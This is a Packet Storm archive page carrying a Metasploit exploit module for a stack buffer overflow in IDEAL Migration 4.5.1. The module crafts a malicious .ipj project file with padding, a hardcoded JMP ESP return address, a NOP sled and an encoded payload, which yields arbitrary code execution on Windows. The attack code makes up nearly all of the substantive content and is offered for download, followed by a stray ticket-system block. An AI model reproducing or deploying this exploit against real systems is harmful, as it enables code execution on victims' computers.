what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

IDEAL Migration 4.5.1 Buffer Overflow

IDEAL Migration 4.5.1 Buffer Overflow
Posted May 10, 2010
Authored by Blake | Site metasploit.com

This Metasploit module exploits a stack overflow in IDEAL Migration version 4.5.1. By creating a specially crafted ipj file, an attacker may be able to execute arbitrary code.

tags | exploit, overflow, arbitrary
SHA-256 | af79d6c56f666491c7e1f5ad8061f0e4d29e40cfdd4335819a5c37ce111973c0

IDEAL Migration 4.5.1 Buffer Overflow

Change Mirror Download
New Ticket: IDEAL Migration v4.5.1 Buffer Overflow (MSF)

# Exploit Title: IDEAL Migration v4.5.1 Buffer Overflow (MSF)
# Date: May 8, 2010
# Author: Blake
# Version: 4.5.1
# Tested on: Windows XP SP3 in VirtualBox

###
## This file is part of the Metasploit Framework and may be subject to
## redistribution and commercial restrictions. Please see the Metasploit
## Framework web site for more information on licensing and terms of use.
## http://metasploit.com/framework/
###

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
Rank = GreatRanking

include Msf::Exploit::FILEFORMAT

def initialize(info = {})
super(update_info(info,
'Name' => 'IDEAL Migration Version 4.5.1 Buffer
Overflow',
'Description' => %q{
This module exploits a stack overflow in IDEAL Migration
version 4.5.1.
By creating a specially crafted ipj file, an an attacker
may be able
to execute arbitrary code.
},
'License' => MSF_LICENSE,
'Author' => [ 'blake' ],
'Version' => 'Version 1',
'References' =>
[
[ 'URL', 'http://www.exploit-db.com/exploits/12404' ],
],
'DefaultOptions' =>
{
'EXITFUNC' => 'seh',
},
'Payload' =>
{
'Space' => 986,
'BadChars' => "\x00\x1a\x0a\x0d",
'StackAdjustment' => -3500,
},
'Platform' => 'win',
'Targets' =>
[
[ 'Windows XP Universal', { 'Ret' => 0x7c96bf33 } ], #
JMP ESP in ULMigration_us.dll
],
'Privileged' => false,
'DisclosureDate' => 'April 26, 2010',
'DefaultTarget' => 0))

register_options(
[
OptString.new('FILENAME', [ false, 'The file name.',
'msf.ipj']),
], self.class)

end

def exploit

sploit = "\x0D\x0A\x5B\x47\x72\x6F\x75\x70\x2C\x45\x78\x70\x6F"
sploit << "\x72\x74\x2C\x59\x65\x73\x5D\x0D\x0A"
sploit << "\x43\x6f\x6d\x70\x75\x74\x65\x72\x3D"
sploit << rand_text_alpha_upper(2420)
sploit << [target.ret].pack('V')
sploit << make_nops(10)
sploit << payload.encoded
sploit << "\x0D\x0A\x5B\x45\x6E\x64\x5D\x0D\x0A"

ipj = sploit

print_status("Creating '#{datastore['FILENAME']}' file ...")

file_create(ipj)

end

end



Ticket Details
===================
Ticket ID: HUO-728007
Department: Exploits
Priority: Medium
Status: Open
Link: http://ph33rus.offsec.com/3874623487438734587634/staff/index.php?_m=tickets&_a=viewticket&ticketid=4036
Login or Register to add favorites

File Archive:

September 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    261 Files
  • 2
    Sep 2nd
    17 Files
  • 3
    Sep 3rd
    0 Files
  • 4
    Sep 4th
    0 Files
  • 5
    Sep 5th
    0 Files
  • 6
    Sep 6th
    0 Files
  • 7
    Sep 7th
    0 Files
  • 8
    Sep 8th
    0 Files
  • 9
    Sep 9th
    0 Files
  • 10
    Sep 10th
    0 Files
  • 11
    Sep 11th
    0 Files
  • 12
    Sep 12th
    0 Files
  • 13
    Sep 13th
    0 Files
  • 14
    Sep 14th
    0 Files
  • 15
    Sep 15th
    0 Files
  • 16
    Sep 16th
    0 Files
  • 17
    Sep 17th
    0 Files
  • 18
    Sep 18th
    0 Files
  • 19
    Sep 19th
    0 Files
  • 20
    Sep 20th
    0 Files
  • 21
    Sep 21st
    0 Files
  • 22
    Sep 22nd
    0 Files
  • 23
    Sep 23rd
    0 Files
  • 24
    Sep 24th
    0 Files
  • 25
    Sep 25th
    0 Files
  • 26
    Sep 26th
    0 Files
  • 27
    Sep 27th
    0 Files
  • 28
    Sep 28th
    0 Files
  • 29
    Sep 29th
    0 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close